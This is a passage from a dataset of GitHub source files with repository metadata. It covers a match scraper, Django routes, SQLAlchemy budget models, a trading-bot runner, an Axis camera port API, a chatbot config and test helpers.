    return livros\n\n    def pesquisar_usuario_por_login(self, conn, login):\n        sql = 'SELECT * FROM usuarios WHERE login=?'\n        cur = conn.cursor()\n        cur.execute(sql, [login])\n        rows = cur.fetchall()\n        return rows\n","repo_name":"HEITORPS123/engenharia_de_software_2_tp","sub_path":"adm_controller.py","file_name":"adm_controller.py","file_ext":"py","file_size_in_byte":5494,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12781476466","text":"# -*- coding: utf-8 -*-\n# @Author: Administrator\n# @Date: 2019-05-14 03:38:39\n# @Last Modified by: Administrator\n# @Last Modified time: 2019-05-16 17:23:40\n\n__all__ = [\n\n \"task_download_global_matches\",\n \"task_download_previous_global_matches\",\n\n ]\n\nimport os\nimport time\nfrom lxml import etree\nfrom urllib.parse import urlparse, parse_qs\nfrom ...client.botzone import BotzoneClient\nfrom ...client.bean import GlobalMatchBean\nfrom ...client.utils import format_timestamp\nfrom ...utils import json_load, json_dump\nfrom ...log import ConsoleLogger\nfrom ..const import CONFIG_JSON_FILE, GLOBAL_MATCHES_DATA_DIR, REQUESTS_INTERVAL, REQUESTS_INTERVAL\nfrom ..utils import log_schedule_task\n\n\n_logger = ConsoleLogger(\"schedule.global_match\")\n_client = BotzoneClient()\n\n\n@log_schedule_task(_logger, \"fetch global matches\")\ndef task_download_global_matches():\n \"\"\"\n 下载第一页内与特定 bot 相关的全局的比赛记录\n \"\"\"\n config = json_load(CONFIG_JSON_FILE)\n gameID = config[\"global_match\"][\"game_id\"]\n botID = config[\"global_match\"][\"bot_id\"]\n\n r = _client.get_global_match_list(gameID)\n tree = etree.HTML(r.content)\n matches = [ GlobalMatchBean(tr)\n for tr in tree.xpath('//body/div[@class=\"container\"]//table//tr[position()>1]') ]\n\n counter = 0\n for match in matches:\n file = os.path.join(GLOBAL_MATCHES_DATA_DIR, \"%s.json\" % match.id)\n if os.path.exists(file):\n continue\n for player in match.players:\n if player.isBot and player.botID == botID:\n json_dump(match.dict, file, ensure_ascii=False, indent=4)\n counter += 1\n break\n\n _logger.info(\"botID: %s\" % botID)\n _logger.info(\"downloaded %d new global matches about this bot\" % counter)\n\n\n@log_schedule_task(_logger, \"fetch previous global matches\")\ndef task_download_previous_global_matches():\n \"\"\"\n 下载从本地记录所保存的最新的 matchID 至今的所有和特定 bot 相关的全局比赛记录\n 如果本地缓存为空,则不执行这个任务\n \"\"\"\n config = json_load(CONFIG_JSON_FILE)\n gameID = config[\"global_match\"][\"game_id\"]\n botID = config[\"global_match\"][\"bot_id\"]\n\n matchIDs = [ filename.rstrip(\".json\") for filename\n in os.listdir(GLOBAL_MATCHES_DATA_DIR) if filename.endswith(\".json\") ]\n\n if len(matchIDs) == 0:\n _logger.info(\"no local records, the latest matchID can't be determined\")\n return\n\n else:\n latestMatchID = max(matchIDs)\n latestMatchTime = None\n\n while True:\n\n _logger.info(\"latest matchID: %s\" % latestMatchID)\n if latestMatchTime is not None:\n _logger.info(\"latest match time: %s\" % format_timestamp(latestMatchTime) )\n\n r = _client.get_global_match_list(gameID, endID=latestMatchID) # 从后往前找\n\n if len(r.history) > 0: # 发生了 302 重定向,原因是无更新记录,这就到达了任务终点\n querys = parse_qs( urlparse(r.url).query )\n msg = querys.get(\"msg\")\n if msg is not None and msg[0] == \"nomore\":\n _logger.info(\"no more matches\")\n break\n else:\n _logger.warning(\"API has changed, msg == %s\" % msg)\n break\n\n tree = etree.HTML(r.content)\n matches = [ GlobalMatchBean(tr)\n for tr in tree.xpath('//body/div[@class=\"container\"]//table//tr[position()>1]') ]\n\n if len(matches) == 0: # 找到了终点\n break\n\n counter = 0\n for match in matches:\n file = os.path.join(GLOBAL_MATCHES_DATA_DIR, \"%s.json\" % match.id)\n if os.path.exists(file):\n continue\n for player in match.players:\n if player.isBot and player.botID == botID:\n json_dump(match.dict, file, ensure_ascii=False, indent=4)\n counter += 1\n break\n\n _logger.info(\"botID: %s\" % botID)\n _logger.info(\"downloaded %d previous new global matches about this bot\" % 
counter)\n\n latestMatchID = matches[0].id\n latestMatchTime = matches[0].time\n\n time.sleep(REQUESTS_INTERVAL)\n _logger.info(\"sleep %.2f s\" % REQUESTS_INTERVAL)\n","repo_name":"zhongxinghong/Botzone-Tank2","sub_path":"tools/_lib/scheduler/tasks/global_match.py","file_name":"global_match.py","file_ext":"py","file_size_in_byte":4446,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"3"}
+{"seq_id":"3718506001","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.Home,name=\"Index\"),\n path(\"indicadores\",views.Indicadores,name=\"Indicadores\"),\n path(\"calculadora\",views.Calculadora,name=\"Calculadora\"),\n path(\"tabla\",views.Tabla,name=\"Tabla\"),\n path(\"descargar\",views.Descargar,name=\"Descargar\"),\n path(\"graficas\",views.Grafica,name=\"Grafica\")\n]\n","repo_name":"daniel-lara-ec/Proy-Actuarial2023A","sub_path":"sitio web/actuarial/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32191636832","text":"\"\"\"CAN models.\"\"\"\nfrom enum import Enum\nfrom typing import Any, ClassVar, Optional\n\nimport sqlalchemy as sa\nfrom models.base import BaseModel\nfrom models.portfolios import Portfolio, shared_portfolio_cans\nfrom models.users import User\nfrom sqlalchemy import (\n Boolean,\n Column,\n Date,\n DateTime,\n ForeignKey,\n Identity,\n Integer,\n Numeric,\n String,\n Table,\n Text,\n case,\n select,\n)\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.orm import (\n InstrumentedAttribute,\n Mapped,\n column_property,\n mapped_column,\n object_session,\n relationship,\n with_polymorphic,\n)\nfrom typing_extensions import override\n\n\nclass BudgetLineItemStatus(Enum):\n DRAFT = 1\n UNDER_REVIEW = 2\n PLANNED = 3\n IN_EXECUTION = 4\n OBLIGATED = 5\n\n\nclass CANArrangementType(Enum):\n OPRE_APPROPRIATION = 1\n COST_SHARE = 2\n IAA = 3\n IDDA = 4\n MOU = 5\n\n\ncan_funding_sources = Table(\n \"can_funding_sources\",\n BaseModel.metadata,\n Column(\"can_id\", ForeignKey(\"can.id\"), primary_key=True),\n Column(\n \"funding_source_id\",\n ForeignKey(\"funding_source.id\"),\n primary_key=True,\n ),\n)\n\n\nclass FundingSource(BaseModel):\n \"\"\"The Funding Source (Source) for the CAN.\n\n From: https://docs.google.com/spreadsheets/d/18FP-ZDnvjtKakj0DDGL9lLXPry8xkqNt/\n\n > Instead of \"\"Source,\"\" consider \"\"Funding Source\"\"\n Instead of \"\"Agency,\"\" consider \"\"Funding Partner\"\"\n \"\"\"\n\n __tablename__ = \"funding_source\"\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False)\n nickname = Column(String(100))\n cans = relationship(\n \"CAN\",\n secondary=can_funding_sources,\n back_populates=\"funding_sources\",\n )\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass FundingPartner(BaseModel):\n \"\"\"The Funding Partner (Agency) for the CAN.\n\n See docstring for FundingSource\n \"\"\"\n\n __tablename__ = \"funding_partner\"\n id = Column(Integer, primary_key=True)\n name = Column(String(100), nullable=False)\n nickname = Column(String(100))\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass AgreementType(Enum):\n CONTRACT = 1\n GRANT = 2\n DIRECT_ALLOCATION = 3\n IAA = 4\n IAA_AA = 5\n MISCELLANEOUS = 6\n\n\nclass AgreementReason(Enum):\n NEW_REQ = 1\n RECOMPETE = 2 ## recompete is brand new contract related to same work\n LOGICAL_FOLLOW_ON = (\n 3 ## Logical Follow On is more work added/extension of the original\n )\n\n\nagreement_team_members = Table(\n \"agreement_team_members\",\n BaseModel.metadata,\n Column(\"agreement_id\", ForeignKey(\"agreement.id\"), primary_key=True),\n Column(\"users_id\", ForeignKey(\"users.id\"), primary_key=True),\n)\n\n\nclass ProductServiceCode(BaseModel):\n \"\"\"Product Service Code\"\"\"\n\n __tablename__ = \"product_service_code\"\n\n id = Column(Integer, primary_key=True)\n name = Column(String, nullable=False)\n naics = Column(Integer, nullable=True)\n support_code = Column(String, nullable=True)\n description = Column(String)\n agreement = relationship(\"Agreement\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n\nclass Agreement(BaseModel):\n \"\"\"Base Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"agreement\"\n\n id: Mapped[int] = mapped_column(Identity(), primary_key=True)\n agreement_type = mapped_column(ENUM(AgreementType), nullable=False)\n name: Mapped[str] = mapped_column(\n String, nullable=False, comment=\"In 
MAPS this was PROJECT.PROJECT_TITLE\"\n )\n\n description: Mapped[str] = mapped_column(String, nullable=True)\n product_service_code_id: Mapped[int] = mapped_column(\n ForeignKey(\"product_service_code.id\"),\n nullable=True,\n )\n product_service_code: Mapped[Optional[ProductServiceCode]] = relationship(\n back_populates=\"agreement\"\n )\n agreement_reason = mapped_column(ENUM(AgreementReason))\n incumbent: Mapped[str] = mapped_column(String, nullable=True)\n project_officer_id: Mapped[int] = mapped_column(\n ForeignKey(\"users.id\"), nullable=True\n )\n project_officer: Mapped[Optional[User]] = relationship(\n User, foreign_keys=[project_officer_id]\n )\n team_members: Mapped[list[User]] = relationship(\n User,\n secondary=agreement_team_members,\n back_populates=\"agreements\",\n )\n research_project_id: Mapped[int] = mapped_column(\n ForeignKey(\"research_project.id\"), nullable=True\n )\n research_project: Mapped[Optional[\"ResearchProject\"]] = relationship(\n \"ResearchProject\", back_populates=\"agreements\"\n )\n budget_line_items: Mapped[list[\"BudgetLineItem\"]] = relationship(\n \"BudgetLineItem\",\n back_populates=\"agreement\",\n lazy=True,\n cascade=\"all, delete\",\n )\n procurement_shop_id: Mapped[int] = mapped_column(\n ForeignKey(\"procurement_shop.id\"), nullable=True\n )\n procurement_shop = relationship(\"ProcurementShop\", back_populates=\"agreements\")\n notes: Mapped[str] = mapped_column(Text, default=\"\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.name\n\n __mapper_args__: dict[str, str | AgreementType] = {\n \"polymorphic_identity\": \"agreement\",\n \"polymorphic_on\": \"agreement_type\",\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.agreement_type, str):\n self.agreement_type = AgreementType[self.agreement_type]\n\n if isinstance(self.agreement_reason, str):\n self.agreement_reason = AgreementReason[self.agreement_reason]\n\n d.update(\n agreement_type=self.agreement_type.name if self.agreement_type else None,\n agreement_reason=self.agreement_reason.name\n if self.agreement_reason\n else None,\n budget_line_items=[bli.to_dict() for bli in self.budget_line_items],\n team_members=[tm.to_dict() for tm in self.team_members],\n research_project=self.research_project.to_dict()\n if self.research_project\n else None,\n procurement_shop=self.procurement_shop.to_dict()\n if self.procurement_shop\n else None,\n product_service_code=self.product_service_code.to_dict()\n if self.product_service_code\n else None,\n )\n\n return d\n\n\ncontract_support_contacts = Table(\n \"contract_support_contacts\",\n BaseModel.metadata,\n Column(\n \"contract_id\",\n ForeignKey(\"contract_agreement.id\"),\n primary_key=True,\n ),\n Column(\"users_id\", ForeignKey(\"users.id\"), primary_key=True),\n)\n\n\nclass ContractType(Enum):\n RESEARCH = 0\n SERVICE = 1\n\n\nclass ContractAgreement(Agreement):\n \"\"\"Contract Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"contract_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n contract_number: Mapped[str] = mapped_column(String, nullable=True)\n vendor: Mapped[str] = mapped_column(String, nullable=True)\n delivered_status: Mapped[bool] = mapped_column(Boolean, default=False)\n contract_type = mapped_column(ENUM(ContractType))\n support_contacts: Mapped[list[User]] = relationship(\n User,\n secondary=contract_support_contacts,\n back_populates=\"contracts\",\n )\n\n 
__mapper_args__ = {\n \"polymorphic_identity\": AgreementType.CONTRACT,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.contract_type, str):\n self.contract_type = ContractType[self.contract_type]\n\n d.update(\n {\n \"contract_type\": self.contract_type.name\n if self.contract_type\n else None,\n \"support_contacts\": [\n contacts.to_dict() for contacts in self.support_contacts\n ],\n }\n )\n\n return d\n\n\n# TODO: Skeleton, will need to be fleshed out more when we know what a Grant is.\nclass GrantAgreement(Agreement):\n \"\"\"Grant Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"grant_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n foa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.GRANT,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\n# TODO: Skeleton, will need to be fleshed out more when we know what an IAA is.\n### Inter-Agency-Agreement\nclass IaaAgreement(Agreement):\n \"\"\"IAA Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"iaa_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n iaa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.IAA,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\n# TODO: Skeleton, will need to be fleshed out more when we know what an IAA-AA is. Inter-Agency-Agreement-Assisted-Acquisition\n### Inter-Agency-Agreement-Assisted-Acquisition\nclass IaaAaAgreement(Agreement):\n \"\"\"IAA-AA Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"iaa_aa_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n iaa_aa: Mapped[str]\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.MISCELLANEOUS,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\nclass DirectAgreement(Agreement):\n \"\"\"Direct Obligation Agreement Model\"\"\"\n\n __versioned__ = {}\n __tablename__ = \"direct_agreement\"\n\n id: Mapped[int] = mapped_column(ForeignKey(\"agreement.id\"), primary_key=True)\n payee: Mapped[str] = mapped_column(String, nullable=False)\n\n __mapper_args__ = {\n \"polymorphic_identity\": AgreementType.DIRECT_ALLOCATION,\n }\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n return d\n\n\nclass CANFiscalYear(BaseModel):\n \"\"\"Contains the relevant financial info by fiscal year for a given CAN.\"\"\"\n\n __tablename__ = \"can_fiscal_year\"\n can_id = Column(Integer, ForeignKey(\"can.id\"), primary_key=True)\n fiscal_year = Column(Integer, primary_key=True)\n can = relationship(\"CAN\", lazy=\"joined\")\n total_fiscal_year_funding = Column(Numeric(12, 2))\n received_funding = Column(Numeric(12, 2))\n expected_funding = Column(Numeric(12, 2))\n potential_additional_funding = Column(Numeric(12, 2))\n can_lead = Column(String)\n notes = Column(String, default=\"\")\n total_funding = column_property(received_funding + expected_funding)\n\n @BaseModel.display_name.getter\n def display_name(self):\n if self.can:\n return f\"{self.can.display_name}:{self.fiscal_year}\"\n return f\"CAN#{self.can_id}:{self.fiscal_year}\"\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n d.update(\n
total_fiscal_year_funding=float(self.total_fiscal_year_funding)\n if self.total_fiscal_year_funding\n else None,\n received_funding=float(self.received_funding)\n if self.received_funding\n else None,\n expected_funding=float(self.expected_funding)\n if self.expected_funding\n else None,\n potential_additional_funding=float(self.potential_additional_funding)\n if self.potential_additional_funding\n else None,\n total_funding=float(self.total_funding) if self.total_funding else None,\n )\n\n return d\n\n\nclass CANFiscalYearCarryForward(BaseModel):\n \"\"\"Contains the relevant financial info by fiscal year for a given CAN carried over from a previous fiscal year.\"\"\"\n\n __tablename__ = \"can_fiscal_year_carry_forward\"\n id = Column(Integer, primary_key=True)\n can_id = Column(Integer, ForeignKey(\"can.id\"))\n can = relationship(\"CAN\", lazy=\"joined\")\n from_fiscal_year = Column(Integer)\n to_fiscal_year = Column(Integer)\n received_amount = Column(Numeric(12, 2), default=0, nullable=False)\n expected_amount = Column(Numeric(12, 2), default=0, nullable=False)\n notes = Column(String, default=\"\")\n total_amount = column_property(received_amount + expected_amount)\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n d.update(\n received_amount=float(self.received_amount)\n if self.received_amount\n else None,\n expected_amount=float(self.expected_amount)\n if self.expected_amount\n else None,\n total_amount=float(self.total_amount) if self.total_amount else None,\n )\n\n return d\n\n\nclass BudgetLineItem(BaseModel):\n __versioned__ = {}\n __tablename__ = \"budget_line_item\"\n\n id = Column(Integer, Identity(), primary_key=True)\n line_description = Column(String)\n comments = Column(Text)\n\n agreement_id = Column(Integer, ForeignKey(\"agreement.id\"))\n agreement = relationship(Agreement, back_populates=\"budget_line_items\")\n\n can_id = Column(Integer, ForeignKey(\"can.id\"))\n can = relationship(\"CAN\", back_populates=\"budget_line_items\")\n\n amount = Column(Numeric(12, 2))\n\n status = Column(sa.Enum(BudgetLineItemStatus))\n\n date_needed = Column(Date)\n proc_shop_fee_percentage = Column(\n Numeric(12, 5)\n ) # may need to be a different object, i.e. 
flat rate or percentage\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.line_description if self.line_description else super().display_name\n\n @property\n def portfolio_id(self):\n return object_session(self).scalar(\n select(Portfolio.id)\n .join(CAN, Portfolio.id == CAN.managing_portfolio_id)\n .join(self.__class__, self.can_id == CAN.id)\n .where(self.__class__.id == self.id)\n )\n\n @property\n def fiscal_year(self):\n date_needed = self.date_needed or None\n month = date_needed.month if date_needed else -1\n year = date_needed.year if date_needed else -1\n return object_session(self).scalar(\n select(\n case(\n (month >= 10, year + 1),\n (month >= 0 and month < 10, year),\n else_=None,\n )\n )\n )\n\n @property\n def team_members(self):\n return self.agreement.team_members if self.agreement else []\n\n @override\n def to_dict(self):\n d = super().to_dict()\n\n if isinstance(self.status, str):\n self.status = BudgetLineItemStatus[self.status]\n\n d.update(\n status=self.status.name if self.status else None,\n amount=float(self.amount) if self.amount else None,\n proc_shop_fee_percentage=float(self.proc_shop_fee_percentage)\n if self.proc_shop_fee_percentage\n else None,\n date_needed=self.date_needed.isoformat() if self.date_needed else None,\n can=self.can.to_dict() if self.can else None,\n )\n\n return d\n\n\nclass CAN(BaseModel):\n \"\"\"\n A CAN is a Common Accounting Number, which is\n used to track money coming into OPRE\n\n This model contains all the relevant\n descriptive information about a given CAN\n \"\"\"\n\n __tablename__ = \"can\"\n id = Column(Integer, Identity(), primary_key=True)\n number = Column(String(30), nullable=False)\n description = Column(String)\n purpose = Column(String, default=\"\")\n nickname = Column(String(30))\n expiration_date = Column(DateTime)\n appropriation_date = Column(DateTime)\n appropriation_term = Column(Integer, default=\"1\")\n arrangement_type = Column(sa.Enum(CANArrangementType))\n funding_sources = relationship(\n FundingSource,\n secondary=can_funding_sources,\n back_populates=\"cans\",\n )\n authorizer_id = Column(Integer, ForeignKey(\"funding_partner.id\"))\n authorizer = relationship(FundingPartner)\n managing_portfolio_id = Column(Integer, ForeignKey(\"portfolio.id\"))\n managing_portfolio = relationship(Portfolio, back_populates=\"cans\")\n shared_portfolios = relationship(\n Portfolio, secondary=shared_portfolio_cans, back_populates=\"shared_cans\"\n )\n budget_line_items = relationship(\"BudgetLineItem\", back_populates=\"can\")\n\n @BaseModel.display_name.getter\n def display_name(self):\n return self.number\n\n @override\n def to_dict(self) -> dict[str, Any]:\n d: dict[str, Any] = super().to_dict()\n\n if isinstance(self.arrangement_type, str):\n self.arrangement_type = CANArrangementType[self.arrangement_type]\n\n d.update(\n appropriation_date=self.appropriation_date.strftime(\"%d/%m/%Y\")\n if self.appropriation_date\n else None,\n expiration_date=self.expiration_date.strftime(\"%d/%m/%Y\")\n if self.expiration_date\n else None,\n arrangement_type=self.arrangement_type.name\n if self.arrangement_type\n else None,\n )\n\n return d\n","repo_name":"HHS/OPRE-OPS","sub_path":"backend/models/cans.py","file_name":"cans.py","file_ext":"py","file_size_in_byte":17445,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"3"}
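The cans.py record above builds a joined-table polymorphic hierarchy (Agreement with contract, grant, IAA and direct subtypes, discriminated by agreement_type) and imports with_polymorphic without using it. A minimal sketch of how such a hierarchy is usually queried with SQLAlchemy 2.0-style sessions; the engine and the vendor filter value are assumptions, not part of the record:

from sqlalchemy import select
from sqlalchemy.orm import Session, with_polymorphic

# Load base rows and subtype columns together in one query.
agreement_poly = with_polymorphic(Agreement, [ContractAgreement, GrantAgreement])

with Session(engine) as session:  # `engine` is assumed to be configured elsewhere
    stmt = select(agreement_poly).where(
        agreement_poly.ContractAgreement.vendor == "ACME"  # illustrative filter
    )
    for agreement in session.scalars(stmt):
        # polymorphic_on maps each row back to its concrete subclass
        print(type(agreement).__name__, agreement.display_name)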
+{"seq_id":"3764911192","text":"from src.environment.env_custom import CustomTradingEnv\nfrom src.model.models import DRLAgent\nfrom src.evaluate.backtest import BackTest\nfrom src.preprocessing.data import build_features\n\n\ndef train_model(data, env_params, model_name, model_params, total_timesteps_model, log_tensorboard=None, tb_name=None):\n env_train_gym = CustomTradingEnv(df=data, **env_params)\n #env_train, _ = env_train_gym.get_sb_env()\n print(f\"Train from [{data['date'].iloc[0]}] to [{data['date'].iloc[-1]}]\")\n\n agent = DRLAgent(env=env_train_gym)\n model = agent.get_model(model_name=model_name, model_kwargs=model_params, tensorboard_log=log_tensorboard)\n return agent.train_model(model=model,\n tb_log_name=tb_name,\n total_timesteps=total_timesteps_model)\n\n\ndef test_model(data, env_params, model, with_graphs=False):\n print(f\"Test from [{data['date'].iloc[0]}] to [{data['date'].iloc[-1]}]\")\n env_test_gym = CustomTradingEnv(df=data, is_training=False, **env_params)\n _, _, allocation_values = DRLAgent.DRL_prediction(model=model, environment=env_test_gym)\n bat = BackTest(model, env_test_gym)\n results = bat.evaluate(allocation_values, data)\n if with_graphs:\n bat.plot_return_against_hold(allocation_values)\n return results\n","repo_name":"Toroi01/TradingRLBot","sub_path":"src/model/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"3"}
+{"seq_id":"31313163536","text":"\"\"\"Axis Vapix port management.\n\nhttps://www.axis.com/vapix-library/#/subjects/t10037719/section/t10074527\n\nI/O port API. Digital input and output ports.\nGeneral purpose I/O service API. Extends I/O port API with support for\n supervised I/Os and relay connectors.\nVirtual input API.\n\"\"\"\n\nfrom typing import Callable\nfrom urllib.parse import quote\n\nPROPERTY = \"Properties.API.HTTP.Version=3\"\n\nURL = \"/axis-cgi/io/port.cgi\"\n\nACTION_HIGH = \"/\"\nACTION_LOW = \"\\\\\"\n\nDIRECTION_IN = \"input\"\nDIRECTION_OUT = \"output\"\n\n\nclass Port:\n \"\"\"Represents a port.\"\"\"\n\n def __init__(self, id: str, raw: dict, request: Callable) -> None:\n \"\"\"Initialize port.\"\"\"\n self.id = id\n self.raw = raw\n self._request = request\n\n @property\n def configurable(self) -> bool:\n \"\"\"Is port configurable.\"\"\"\n return self.raw.get(\"Configurable\", False)\n\n @property\n def direction(self) -> str:\n \"\"\"Port is configured to act as input or output.\n\n Read-only for non-configurable ports.\n \"\"\"\n return self.raw.get(\"Direction\", DIRECTION_IN)\n\n @property\n def input_trig(self) -> str:\n \"\"\"When port should trigger.\n\n closed=The input port triggers when the circuit is closed.\n open=The input port triggers when the circuit is open.\n \"\"\"\n return self.raw.get(\"Input.Trig\", \"\")\n\n @property\n def name(self) -> str:\n \"\"\"Return name relevant to direction.\"\"\"\n if self.direction == DIRECTION_IN:\n return self.raw.get(\"Input.Name\", \"\")\n return self.raw.get(\"Output.Name\", \"\")\n\n @property\n def output_active(self) -> str:\n \"\"\"When is output port state active.\n\n closed=The output port is active when the circuit is closed.\n open=The output port is active when the circuit is open.\n \"\"\"\n return self.raw.get(\"Output.Active\", \"\")\n\n async def action(self, action: str) -> None:\n r\"\"\"Activate or deactivate an output.\n\n Use the option to activate/deactivate the port for a\n limited period of time.\n = Port name. Default: Name from Output.Name\n = Action character. /=active, \\=inactive\n = Delay before the next action. Unit: milliseconds\n Note: The :, / and \\ characters must be percent-encoded in the URI.\n See Percent encoding.\n Example:\n To set output 1 to active, use 1:/.\n In the URI, the action argument becomes action=1%3A%2F\n \"\"\"\n if not self.direction == DIRECTION_OUT:\n return\n\n port_action = quote(f\"{int(self.id) + 1}:{action}\", safe=\"\")\n url = URL + f\"?action={port_action}\"\n\n await self._request(\"get\", url)\n\n async def open(self) -> None:\n \"\"\"Open port.\"\"\"\n await self.action(ACTION_LOW)\n\n async def close(self) -> None:\n \"\"\"Close port.\"\"\"\n await self.action(ACTION_HIGH)\n","repo_name":"Kane610/axis","sub_path":"axis/vapix/models/port_cgi.py","file_name":"port_cgi.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"3"}
+{"seq_id":"74082854802","text":"import os\n# [step 1]>> 例如: API_KEY = \"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\" (此key无效)\nAPI_KEY = os.getenv('MY_SECRET_KEY')\n\n# [step 2]>> 改为True应用代理,如果直接在海外服务器部署,此处不修改\nUSE_PROXY = False if os.getenv('IS_USE_PROXY') == 'False' else True\n# USE_PROXY = False\n\nPORT = 7890\nif USE_PROXY:\n # 填写格式是 [协议]:// [地址] :[端口],填写之前不要忘记把USE_PROXY改成True,如果直接在海外服务器部署,此处不修改\n # 例如 \"socks5h://localhost:11284\"\n # [协议] 常见协议无非socks5h/http; 例如 v2**y 和 ss* 的默认本地协议是socks5h; 而cl**h 的默认本地协议是http\n # [地址] 懂的都懂,不懂就填localhost或者127.0.0.1肯定错不了(localhost意思是代理软件安装在本机上)\n # [端口] 在代理软件的设置里找。虽然不同的代理软件界面不一样,但端口号都应该在最显眼的位置上\n\n # 代理网络的地址,打开你的科学上网软件查看代理的协议(socks5/http)、地址(localhost)和端口(11284)\n proxies = {\n # [协议]:// [地址] :[端口]\n \"http\": \"socks5h://localhost:{}\".format(PORT),\n \"https\": \"socks5h://localhost:{}\".format(PORT),\n }\nelse:\n proxies = None\n\n# OpenAI的API_URL\nAPI_URL = \"https://api.openai.com/v1/chat/completions\"\n# API_URL = os.getenv('MY_BASE_URL')\n\n# 多线程函数插件中,默认允许多少路线程同时访问OpenAI。\n# Free trial users的限制是每分钟3次,Pay-as-you-go users的限制是每分钟3500次。提高限制请查询:\n# https://platform.openai.com/docs/guides/rate-limits/overview\nDEFAULT_WORKER_NUM = 3\n\n\n# [step 3]>> 以下配置可以优化体验,但大部分场合下并不需要修改\n# 对话窗的高度\nCHATBOT_HEIGHT = 1115\n\n# 代码高亮\nCODE_HIGHLIGHT = True\n\n# 窗口布局\nLAYOUT = \"LEFT-RIGHT\" # \"LEFT-RIGHT\"(左右布局) # \"TOP-DOWN\"(上下布局)\n\n# 发送请求到OpenAI后,等待多久判定为超时\nTIMEOUT_SECONDS = 30\n\n# 网页的端口, -1代表随机端口\nWEB_PORT = -1\n\n# 如果OpenAI不响应(网络卡顿、代理失败、KEY失效),重试的次数限制\nMAX_RETRY = 2\n\n# OpenAI模型选择是(gpt4现在只对申请成功的人开放)\nLLM_MODEL = \"gpt-3.5-turbo\"\n\n# 设置并行使用的线程数\nCONCURRENT_COUNT = 10\n\n# 设置用户名和密码(相关功能不稳定,与gradio版本和网络都相关,如果本地使用不建议加这个)\n# [(\"username\", \"password\"), (\"username2\", \"password2\"), ...]\nAUTHENTICATION = []\n","repo_name":"Jehuty-ML/chatgpt-academic","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"29256868357","text":"import calendar\nimport time\nfrom asyncio import coroutine\nfrom datetime import date, datetime, timezone\nfrom decimal import Decimal\nfrom typing import Optional, Union\nfrom unittest.mock import Mock\n\nfrom google.protobuf import timestamp_pb2\n\n\ndef dt(\n value: Union[int, str], *, as_proto: bool = False\n) -> Union[datetime, date, timestamp_pb2.Timestamp]:\n\n if isinstance(value, int):\n res = datetime.fromtimestamp(value, tz=timezone.utc)\n elif len(value) > 10:\n res = datetime(\n *time.strptime(value, \"%Y-%m-%d %H:%M:%S\")[:6], tzinfo=timezone.utc\n )\n else:\n res = date(*time.strptime(value, \"%Y-%m-%d\")[:3])\n\n if as_proto:\n seconds = (\n calendar.timegm(res.timetuple())\n if isinstance(res, date)\n else int(res.timestamp())\n )\n res = timestamp_pb2.Timestamp(seconds=seconds)\n\n return res\n\n\ndef dt_timestamp(value: Union[str, int]) -> int:\n return int(dt(value).timestamp())\n\n\ndef coro_mock():\n coro = Mock(name=\"CoroutineResult\")\n corofunc = Mock(name=\"CoroutineFunction\", side_effect=coroutine(coro))\n corofunc.coro = coro\n return corofunc\n\n\ndef make_event(\n campaign_id: int,\n timestamp: int,\n name: Optional[str] = \"pin.show\",\n cost: Optional[Decimal] = None,\n event_group_id: str = \"37b36bd03bf84fcfe8f95ab43191653c\",\n) -> tuple:\n return (\n datetime.utcfromtimestamp(timestamp),\n campaign_id,\n event_group_id,\n 4,\n \"4CE92B30-6A33-457D-A7D4-1B8CBAD54597\",\n \"iOS\",\n \"1112\",\n 11476,\n 55.718732876522175,\n 37.40151579701865,\n f\"geoadv.bb.{name}\",\n ) + ((cost,) if cost is not None else ())\n\n\ndef make_charged_event(*args):\n return 